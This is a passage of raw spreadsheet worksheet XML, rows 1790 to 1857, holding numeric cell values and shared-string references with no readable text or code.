      </c>
      <c r="E1790" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1790" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="1791" ht="15.75" customHeight="1">
      <c r="A1791" s="1">
        <v>23218.0</v>
      </c>
      <c r="B1791" s="2">
        <v>5277106.0</v>
      </c>
      <c r="C1791" s="2" t="s">
        <v>1638</v>
      </c>
      <c r="D1791" s="2">
        <v>1.0</v>
      </c>
      <c r="E1791" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1791" s="2">
        <v>0.1101532567049809</v>
      </c>
    </row>
    <row r="1792" ht="15.75" customHeight="1">
      <c r="A1792" s="1">
        <v>8786.0</v>
      </c>
      <c r="B1792" s="2">
        <v>5.4591414E7</v>
      </c>
      <c r="C1792" s="2" t="s">
        <v>1639</v>
      </c>
      <c r="D1792" s="2">
        <v>1.0</v>
      </c>
      <c r="E1792" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1792" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1793" ht="15.75" customHeight="1">
      <c r="A1793" s="1">
        <v>21896.0</v>
      </c>
      <c r="B1793" s="2">
        <v>2.7843122E7</v>
      </c>
      <c r="C1793" s="2" t="s">
        <v>1640</v>
      </c>
      <c r="D1793" s="2">
        <v>1.0</v>
      </c>
      <c r="E1793" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1793" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1794" ht="15.75" customHeight="1">
      <c r="A1794" s="1">
        <v>21929.0</v>
      </c>
      <c r="B1794" s="2">
        <v>2.8480542E7</v>
      </c>
      <c r="C1794" s="2" t="s">
        <v>1641</v>
      </c>
      <c r="D1794" s="2">
        <v>1.0</v>
      </c>
      <c r="E1794" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1794" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1795" ht="15.75" customHeight="1">
      <c r="A1795" s="1">
        <v>22628.0</v>
      </c>
      <c r="B1795" s="2">
        <v>4.0468254E7</v>
      </c>
      <c r="C1795" s="2" t="s">
        <v>1278</v>
      </c>
      <c r="D1795" s="2">
        <v>1.0</v>
      </c>
      <c r="E1795" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1795" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1796" ht="15.75" customHeight="1">
      <c r="A1796" s="1">
        <v>24632.0</v>
      </c>
      <c r="B1796" s="2">
        <v>1.1473842E7</v>
      </c>
      <c r="C1796" s="2" t="s">
        <v>1642</v>
      </c>
      <c r="D1796" s="2">
        <v>1.0</v>
      </c>
      <c r="E1796" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1796" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1797" ht="15.75" customHeight="1">
      <c r="A1797" s="1">
        <v>28826.0</v>
      </c>
      <c r="B1797" s="2">
        <v>2.8835133E7</v>
      </c>
      <c r="C1797" s="2" t="s">
        <v>1643</v>
      </c>
      <c r="D1797" s="2">
        <v>1.0</v>
      </c>
      <c r="E1797" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1797" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1798" ht="15.75" customHeight="1">
      <c r="A1798" s="1">
        <v>28986.0</v>
      </c>
      <c r="B1798" s="2">
        <v>2.9842538E7</v>
      </c>
      <c r="C1798" s="2" t="s">
        <v>1644</v>
      </c>
      <c r="D1798" s="2">
        <v>1.0</v>
      </c>
      <c r="E1798" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1798" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1799" ht="15.75" customHeight="1">
      <c r="A1799" s="1">
        <v>31853.0</v>
      </c>
      <c r="B1799" s="2">
        <v>5277105.0</v>
      </c>
      <c r="C1799" s="2" t="s">
        <v>1645</v>
      </c>
      <c r="D1799" s="2">
        <v>1.0</v>
      </c>
      <c r="E1799" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1799" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1800" ht="15.75" customHeight="1">
      <c r="A1800" s="1">
        <v>33488.0</v>
      </c>
      <c r="B1800" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C1800" s="2" t="s">
        <v>1646</v>
      </c>
      <c r="D1800" s="2">
        <v>1.0</v>
      </c>
      <c r="E1800" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1800" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="1801" ht="15.75" customHeight="1">
      <c r="A1801" s="1">
        <v>371.0</v>
      </c>
      <c r="B1801" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C1801" s="2" t="s">
        <v>1647</v>
      </c>
      <c r="D1801" s="2">
        <v>1.0</v>
      </c>
      <c r="E1801" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1801" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="1802" ht="15.75" customHeight="1">
      <c r="A1802" s="1">
        <v>1302.0</v>
      </c>
      <c r="B1802" s="2">
        <v>2.567139E7</v>
      </c>
      <c r="C1802" s="2" t="s">
        <v>1648</v>
      </c>
      <c r="D1802" s="2">
        <v>1.0</v>
      </c>
      <c r="E1802" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1802" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="1803" ht="15.75" customHeight="1">
      <c r="A1803" s="1">
        <v>6557.0</v>
      </c>
      <c r="B1803" s="2">
        <v>4.8878972E7</v>
      </c>
      <c r="C1803" s="2" t="s">
        <v>1649</v>
      </c>
      <c r="D1803" s="2">
        <v>1.0</v>
      </c>
      <c r="E1803" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1803" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="1804" ht="15.75" customHeight="1">
      <c r="A1804" s="1">
        <v>25603.0</v>
      </c>
      <c r="B1804" s="2">
        <v>1.4395235E7</v>
      </c>
      <c r="C1804" s="2" t="s">
        <v>1650</v>
      </c>
      <c r="D1804" s="2">
        <v>1.0</v>
      </c>
      <c r="E1804" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1804" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="1805" ht="15.75" customHeight="1">
      <c r="A1805" s="1">
        <v>28040.0</v>
      </c>
      <c r="B1805" s="2">
        <v>2.4495068E7</v>
      </c>
      <c r="C1805" s="2" t="s">
        <v>1651</v>
      </c>
      <c r="D1805" s="2">
        <v>1.0</v>
      </c>
      <c r="E1805" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1805" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="1806" ht="15.75" customHeight="1">
      <c r="A1806" s="1">
        <v>30946.0</v>
      </c>
      <c r="B1806" s="2">
        <v>4.7336868E7</v>
      </c>
      <c r="C1806" s="2" t="s">
        <v>1652</v>
      </c>
      <c r="D1806" s="2">
        <v>1.0</v>
      </c>
      <c r="E1806" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1806" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="1807" ht="15.75" customHeight="1">
      <c r="A1807" s="1">
        <v>375.0</v>
      </c>
      <c r="B1807" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C1807" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="D1807" s="2">
        <v>1.0</v>
      </c>
      <c r="E1807" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1807" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1808" ht="15.75" customHeight="1">
      <c r="A1808" s="1">
        <v>1591.0</v>
      </c>
      <c r="B1808" s="2">
        <v>2.7746523E7</v>
      </c>
      <c r="C1808" s="2" t="s">
        <v>1654</v>
      </c>
      <c r="D1808" s="2">
        <v>1.0</v>
      </c>
      <c r="E1808" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1808" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1809" ht="15.75" customHeight="1">
      <c r="A1809" s="1">
        <v>1853.0</v>
      </c>
      <c r="B1809" s="2">
        <v>2.9491364E7</v>
      </c>
      <c r="C1809" s="2" t="s">
        <v>1655</v>
      </c>
      <c r="D1809" s="2">
        <v>1.0</v>
      </c>
      <c r="E1809" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1809" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1810" ht="15.75" customHeight="1">
      <c r="A1810" s="1">
        <v>1978.0</v>
      </c>
      <c r="B1810" s="2">
        <v>3.043369E7</v>
      </c>
      <c r="C1810" s="2" t="s">
        <v>1656</v>
      </c>
      <c r="D1810" s="2">
        <v>1.0</v>
      </c>
      <c r="E1810" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1810" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1811" ht="15.75" customHeight="1">
      <c r="A1811" s="1">
        <v>3638.0</v>
      </c>
      <c r="B1811" s="2">
        <v>3.9281967E7</v>
      </c>
      <c r="C1811" s="2" t="s">
        <v>1657</v>
      </c>
      <c r="D1811" s="2">
        <v>1.0</v>
      </c>
      <c r="E1811" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1811" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1812" ht="15.75" customHeight="1">
      <c r="A1812" s="1">
        <v>3808.0</v>
      </c>
      <c r="B1812" s="2">
        <v>4.0040607E7</v>
      </c>
      <c r="C1812" s="2" t="s">
        <v>1658</v>
      </c>
      <c r="D1812" s="2">
        <v>1.0</v>
      </c>
      <c r="E1812" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1812" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1813" ht="15.75" customHeight="1">
      <c r="A1813" s="1">
        <v>5673.0</v>
      </c>
      <c r="B1813" s="2">
        <v>4.634607E7</v>
      </c>
      <c r="C1813" s="2" t="s">
        <v>1659</v>
      </c>
      <c r="D1813" s="2">
        <v>1.0</v>
      </c>
      <c r="E1813" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1813" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1814" ht="15.75" customHeight="1">
      <c r="A1814" s="1">
        <v>6855.0</v>
      </c>
      <c r="B1814" s="2">
        <v>4.9646347E7</v>
      </c>
      <c r="C1814" s="2" t="s">
        <v>1660</v>
      </c>
      <c r="D1814" s="2">
        <v>1.0</v>
      </c>
      <c r="E1814" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1814" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1815" ht="15.75" customHeight="1">
      <c r="A1815" s="1">
        <v>7274.0</v>
      </c>
      <c r="B1815" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C1815" s="2" t="s">
        <v>1661</v>
      </c>
      <c r="D1815" s="2">
        <v>1.0</v>
      </c>
      <c r="E1815" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1815" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1816" ht="15.75" customHeight="1">
      <c r="A1816" s="1">
        <v>7536.0</v>
      </c>
      <c r="B1816" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C1816" s="2" t="s">
        <v>1662</v>
      </c>
      <c r="D1816" s="2">
        <v>1.0</v>
      </c>
      <c r="E1816" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1816" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1817" ht="15.75" customHeight="1">
      <c r="A1817" s="1">
        <v>8147.0</v>
      </c>
      <c r="B1817" s="2">
        <v>5.3161495E7</v>
      </c>
      <c r="C1817" s="2" t="s">
        <v>1663</v>
      </c>
      <c r="D1817" s="2">
        <v>1.0</v>
      </c>
      <c r="E1817" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1817" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1818" ht="15.75" customHeight="1">
      <c r="A1818" s="1">
        <v>9063.0</v>
      </c>
      <c r="B1818" s="2">
        <v>5.5109113E7</v>
      </c>
      <c r="C1818" s="2" t="s">
        <v>1664</v>
      </c>
      <c r="D1818" s="2">
        <v>1.0</v>
      </c>
      <c r="E1818" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1818" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1819" ht="15.75" customHeight="1">
      <c r="A1819" s="1">
        <v>9247.0</v>
      </c>
      <c r="B1819" s="2">
        <v>5.5473488E7</v>
      </c>
      <c r="C1819" s="2" t="s">
        <v>1665</v>
      </c>
      <c r="D1819" s="2">
        <v>1.0</v>
      </c>
      <c r="E1819" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1819" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1820" ht="15.75" customHeight="1">
      <c r="A1820" s="1">
        <v>9518.0</v>
      </c>
      <c r="B1820" s="2">
        <v>5.597124E7</v>
      </c>
      <c r="C1820" s="2" t="s">
        <v>1666</v>
      </c>
      <c r="D1820" s="2">
        <v>1.0</v>
      </c>
      <c r="E1820" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1820" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1821" ht="15.75" customHeight="1">
      <c r="A1821" s="1">
        <v>9527.0</v>
      </c>
      <c r="B1821" s="2">
        <v>5.5980269E7</v>
      </c>
      <c r="C1821" s="2" t="s">
        <v>1667</v>
      </c>
      <c r="D1821" s="2">
        <v>1.0</v>
      </c>
      <c r="E1821" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1821" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1822" ht="15.75" customHeight="1">
      <c r="A1822" s="1">
        <v>10326.0</v>
      </c>
      <c r="B1822" s="2">
        <v>5.7712777E7</v>
      </c>
      <c r="C1822" s="2" t="s">
        <v>1668</v>
      </c>
      <c r="D1822" s="2">
        <v>1.0</v>
      </c>
      <c r="E1822" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1822" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1823" ht="15.75" customHeight="1">
      <c r="A1823" s="1">
        <v>10435.0</v>
      </c>
      <c r="B1823" s="2">
        <v>1.0337775E7</v>
      </c>
      <c r="C1823" s="2" t="s">
        <v>1669</v>
      </c>
      <c r="D1823" s="2">
        <v>1.0</v>
      </c>
      <c r="E1823" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1823" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1824" ht="15.75" customHeight="1">
      <c r="A1824" s="1">
        <v>10592.0</v>
      </c>
      <c r="B1824" s="2">
        <v>1.3430759E7</v>
      </c>
      <c r="C1824" s="2" t="s">
        <v>1670</v>
      </c>
      <c r="D1824" s="2">
        <v>1.0</v>
      </c>
      <c r="E1824" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1824" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1825" ht="15.75" customHeight="1">
      <c r="A1825" s="1">
        <v>10757.0</v>
      </c>
      <c r="B1825" s="2">
        <v>1.5509227E7</v>
      </c>
      <c r="C1825" s="2" t="s">
        <v>1671</v>
      </c>
      <c r="D1825" s="2">
        <v>1.0</v>
      </c>
      <c r="E1825" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1825" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1826" ht="15.75" customHeight="1">
      <c r="A1826" s="1">
        <v>11035.0</v>
      </c>
      <c r="B1826" s="2">
        <v>1.7993391E7</v>
      </c>
      <c r="C1826" s="2" t="s">
        <v>1672</v>
      </c>
      <c r="D1826" s="2">
        <v>1.0</v>
      </c>
      <c r="E1826" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1826" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1827" ht="15.75" customHeight="1">
      <c r="A1827" s="1">
        <v>11304.0</v>
      </c>
      <c r="B1827" s="2">
        <v>2.0992696E7</v>
      </c>
      <c r="C1827" s="2" t="s">
        <v>1673</v>
      </c>
      <c r="D1827" s="2">
        <v>1.0</v>
      </c>
      <c r="E1827" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1827" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1828" ht="15.75" customHeight="1">
      <c r="A1828" s="1">
        <v>11886.0</v>
      </c>
      <c r="B1828" s="2">
        <v>2.5095561E7</v>
      </c>
      <c r="C1828" s="2" t="s">
        <v>1674</v>
      </c>
      <c r="D1828" s="2">
        <v>1.0</v>
      </c>
      <c r="E1828" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1828" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1829" ht="15.75" customHeight="1">
      <c r="A1829" s="1">
        <v>13210.0</v>
      </c>
      <c r="B1829" s="2">
        <v>3.4163685E7</v>
      </c>
      <c r="C1829" s="2" t="s">
        <v>1675</v>
      </c>
      <c r="D1829" s="2">
        <v>1.0</v>
      </c>
      <c r="E1829" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1829" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1830" ht="15.75" customHeight="1">
      <c r="A1830" s="1">
        <v>14093.0</v>
      </c>
      <c r="B1830" s="2">
        <v>3.7733937E7</v>
      </c>
      <c r="C1830" s="2" t="s">
        <v>1676</v>
      </c>
      <c r="D1830" s="2">
        <v>1.0</v>
      </c>
      <c r="E1830" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1830" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1831" ht="15.75" customHeight="1">
      <c r="A1831" s="1">
        <v>14185.0</v>
      </c>
      <c r="B1831" s="2">
        <v>3.8136692E7</v>
      </c>
      <c r="C1831" s="2" t="s">
        <v>1677</v>
      </c>
      <c r="D1831" s="2">
        <v>1.0</v>
      </c>
      <c r="E1831" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1831" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1832" ht="15.75" customHeight="1">
      <c r="A1832" s="1">
        <v>15124.0</v>
      </c>
      <c r="B1832" s="2">
        <v>4.1887267E7</v>
      </c>
      <c r="C1832" s="2" t="s">
        <v>1678</v>
      </c>
      <c r="D1832" s="2">
        <v>1.0</v>
      </c>
      <c r="E1832" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1832" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1833" ht="15.75" customHeight="1">
      <c r="A1833" s="1">
        <v>15215.0</v>
      </c>
      <c r="B1833" s="2">
        <v>4.2145884E7</v>
      </c>
      <c r="C1833" s="2" t="s">
        <v>1679</v>
      </c>
      <c r="D1833" s="2">
        <v>1.0</v>
      </c>
      <c r="E1833" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1833" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1834" ht="15.75" customHeight="1">
      <c r="A1834" s="1">
        <v>15225.0</v>
      </c>
      <c r="B1834" s="2">
        <v>4.2186091E7</v>
      </c>
      <c r="C1834" s="2" t="s">
        <v>1680</v>
      </c>
      <c r="D1834" s="2">
        <v>1.0</v>
      </c>
      <c r="E1834" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1834" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1835" ht="15.75" customHeight="1">
      <c r="A1835" s="1">
        <v>15234.0</v>
      </c>
      <c r="B1835" s="2">
        <v>4.2233268E7</v>
      </c>
      <c r="C1835" s="2" t="s">
        <v>1681</v>
      </c>
      <c r="D1835" s="2">
        <v>1.0</v>
      </c>
      <c r="E1835" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1835" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1836" ht="15.75" customHeight="1">
      <c r="A1836" s="1">
        <v>15507.0</v>
      </c>
      <c r="B1836" s="2">
        <v>4.3231335E7</v>
      </c>
      <c r="C1836" s="2" t="s">
        <v>1682</v>
      </c>
      <c r="D1836" s="2">
        <v>1.0</v>
      </c>
      <c r="E1836" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1836" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1837" ht="15.75" customHeight="1">
      <c r="A1837" s="1">
        <v>15614.0</v>
      </c>
      <c r="B1837" s="2">
        <v>4.352585E7</v>
      </c>
      <c r="C1837" s="2" t="s">
        <v>1683</v>
      </c>
      <c r="D1837" s="2">
        <v>1.0</v>
      </c>
      <c r="E1837" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1837" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1838" ht="15.75" customHeight="1">
      <c r="A1838" s="1">
        <v>15643.0</v>
      </c>
      <c r="B1838" s="2">
        <v>4.360399E7</v>
      </c>
      <c r="C1838" s="2" t="s">
        <v>1684</v>
      </c>
      <c r="D1838" s="2">
        <v>1.0</v>
      </c>
      <c r="E1838" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1838" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1839" ht="15.75" customHeight="1">
      <c r="A1839" s="1">
        <v>18653.0</v>
      </c>
      <c r="B1839" s="2">
        <v>5.3466944E7</v>
      </c>
      <c r="C1839" s="2" t="s">
        <v>1685</v>
      </c>
      <c r="D1839" s="2">
        <v>1.0</v>
      </c>
      <c r="E1839" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1839" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1840" ht="15.75" customHeight="1">
      <c r="A1840" s="1">
        <v>19673.0</v>
      </c>
      <c r="B1840" s="2">
        <v>5.6390365E7</v>
      </c>
      <c r="C1840" s="2" t="s">
        <v>1686</v>
      </c>
      <c r="D1840" s="2">
        <v>1.0</v>
      </c>
      <c r="E1840" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1840" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1841" ht="15.75" customHeight="1">
      <c r="A1841" s="1">
        <v>20596.0</v>
      </c>
      <c r="B1841" s="2">
        <v>1.3821076E7</v>
      </c>
      <c r="C1841" s="2" t="s">
        <v>1687</v>
      </c>
      <c r="D1841" s="2">
        <v>1.0</v>
      </c>
      <c r="E1841" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1841" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1842" ht="15.75" customHeight="1">
      <c r="A1842" s="1">
        <v>20663.0</v>
      </c>
      <c r="B1842" s="2">
        <v>1.4334203E7</v>
      </c>
      <c r="C1842" s="2" t="s">
        <v>1688</v>
      </c>
      <c r="D1842" s="2">
        <v>1.0</v>
      </c>
      <c r="E1842" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1842" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1843" ht="15.75" customHeight="1">
      <c r="A1843" s="1">
        <v>20699.0</v>
      </c>
      <c r="B1843" s="2">
        <v>1.4524835E7</v>
      </c>
      <c r="C1843" s="2" t="s">
        <v>1689</v>
      </c>
      <c r="D1843" s="2">
        <v>1.0</v>
      </c>
      <c r="E1843" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1843" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1844" ht="15.75" customHeight="1">
      <c r="A1844" s="1">
        <v>20746.0</v>
      </c>
      <c r="B1844" s="2">
        <v>1.4792728E7</v>
      </c>
      <c r="C1844" s="2" t="s">
        <v>1690</v>
      </c>
      <c r="D1844" s="2">
        <v>1.0</v>
      </c>
      <c r="E1844" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1844" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1845" ht="15.75" customHeight="1">
      <c r="A1845" s="1">
        <v>20779.0</v>
      </c>
      <c r="B1845" s="2">
        <v>1.5026449E7</v>
      </c>
      <c r="C1845" s="2" t="s">
        <v>1691</v>
      </c>
      <c r="D1845" s="2">
        <v>1.0</v>
      </c>
      <c r="E1845" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1845" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1846" ht="15.75" customHeight="1">
      <c r="A1846" s="1">
        <v>21103.0</v>
      </c>
      <c r="B1846" s="2">
        <v>1.8132694E7</v>
      </c>
      <c r="C1846" s="2" t="s">
        <v>1692</v>
      </c>
      <c r="D1846" s="2">
        <v>1.0</v>
      </c>
      <c r="E1846" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1846" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1847" ht="15.75" customHeight="1">
      <c r="A1847" s="1">
        <v>21151.0</v>
      </c>
      <c r="B1847" s="2">
        <v>1.8768202E7</v>
      </c>
      <c r="C1847" s="2" t="s">
        <v>1693</v>
      </c>
      <c r="D1847" s="2">
        <v>1.0</v>
      </c>
      <c r="E1847" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1847" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1848" ht="15.75" customHeight="1">
      <c r="A1848" s="1">
        <v>21200.0</v>
      </c>
      <c r="B1848" s="2">
        <v>1.9496233E7</v>
      </c>
      <c r="C1848" s="2" t="s">
        <v>1694</v>
      </c>
      <c r="D1848" s="2">
        <v>1.0</v>
      </c>
      <c r="E1848" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1848" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1849" ht="15.75" customHeight="1">
      <c r="A1849" s="1">
        <v>21386.0</v>
      </c>
      <c r="B1849" s="2">
        <v>2.1700951E7</v>
      </c>
      <c r="C1849" s="2" t="s">
        <v>1695</v>
      </c>
      <c r="D1849" s="2">
        <v>1.0</v>
      </c>
      <c r="E1849" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1849" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1850" ht="15.75" customHeight="1">
      <c r="A1850" s="1">
        <v>21397.0</v>
      </c>
      <c r="B1850" s="2">
        <v>2.1803529E7</v>
      </c>
      <c r="C1850" s="2" t="s">
        <v>1696</v>
      </c>
      <c r="D1850" s="2">
        <v>1.0</v>
      </c>
      <c r="E1850" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1850" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1851" ht="15.75" customHeight="1">
      <c r="A1851" s="1">
        <v>21629.0</v>
      </c>
      <c r="B1851" s="2">
        <v>2.4642924E7</v>
      </c>
      <c r="C1851" s="2" t="s">
        <v>1697</v>
      </c>
      <c r="D1851" s="2">
        <v>1.0</v>
      </c>
      <c r="E1851" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1851" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1852" ht="15.75" customHeight="1">
      <c r="A1852" s="1">
        <v>21748.0</v>
      </c>
      <c r="B1852" s="2">
        <v>2.6033246E7</v>
      </c>
      <c r="C1852" s="2" t="s">
        <v>1698</v>
      </c>
      <c r="D1852" s="2">
        <v>1.0</v>
      </c>
      <c r="E1852" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1852" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1853" ht="15.75" customHeight="1">
      <c r="A1853" s="1">
        <v>22208.0</v>
      </c>
      <c r="B1853" s="2">
        <v>3.2132977E7</v>
      </c>
      <c r="C1853" s="2" t="s">
        <v>1699</v>
      </c>
      <c r="D1853" s="2">
        <v>1.0</v>
      </c>
      <c r="E1853" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1853" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1854" ht="15.75" customHeight="1">
      <c r="A1854" s="1">
        <v>22214.0</v>
      </c>
      <c r="B1854" s="2">
        <v>3.2184034E7</v>
      </c>
      <c r="C1854" s="2" t="s">
        <v>1700</v>
      </c>
      <c r="D1854" s="2">
        <v>1.0</v>
      </c>
      <c r="E1854" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1854" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1855" ht="15.75" customHeight="1">
      <c r="A1855" s="1">
        <v>22230.0</v>
      </c>
      <c r="B1855" s="2">
        <v>3.2469159E7</v>
      </c>
      <c r="C1855" s="2" t="s">
        <v>1701</v>
      </c>
      <c r="D1855" s="2">
        <v>1.0</v>
      </c>
      <c r="E1855" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1855" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1856" ht="15.75" customHeight="1">
      <c r="A1856" s="1">
        <v>22629.0</v>
      </c>
      <c r="B1856" s="2">
        <v>4.048911E7</v>
      </c>
      <c r="C1856" s="2" t="s">
        <v>1702</v>
      </c>
      <c r="D1856" s="2">
        <v>1.0</v>
      </c>
      <c r="E1856" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1856" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1857" ht="15.75" customHeight="1">
      <c r="A1857" s="1">
        <v>22685.0</v>
      </c>
      <c r="B1857" s="2">
        <v>4.2153345E7</v>
      </c>
      <c r="C1857" s="2" t="s">
        <v>1703</v>
      </c>
      <c r="D1857" s="2">
        <v>1.0</v>
      </c>
      <c r="E1857" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1857" s="2">
        <v>0.1101190476190476</v>
      </c>
